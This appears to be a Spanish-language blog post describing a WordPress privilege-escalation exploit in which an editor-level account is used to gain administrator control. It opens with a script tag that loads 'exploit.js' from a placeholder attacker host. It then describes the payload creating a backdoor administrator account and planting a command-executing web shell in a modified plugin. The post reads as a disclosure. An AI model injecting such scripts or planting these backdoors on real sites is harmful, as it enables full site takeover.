<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script><script src="http://direccionremotadelatacante/exploit.js"></script>
- Crea un nuevo usuario con permisos de administrador con las credenciales: backdoor:pwned
- Instala un plugin llamado “Mortgage Calculator Plus”, edita el código fuente del mismo para agregar código PHP que toma el valor del parámetro “cmd”, para ejecutar los comandos en el servidor y muestra la respuesta en pantalla.
Wordpress ha indicado que no consideran esto una vulnerabilidad, por lo que no existirá parche de manera inmediata.
El efecto
Este exploit es principalmente importante porque generalmente las cuentas administrativas tienen mayor foco de atención, mientras que las cuentas de editor pueden ser personas no técnicas que podrían ser el vector de ataque para lograr privilegios administrativos en un sitio web con WordPress.
Video de la PoC
0 comentarios:
Publicar un comentario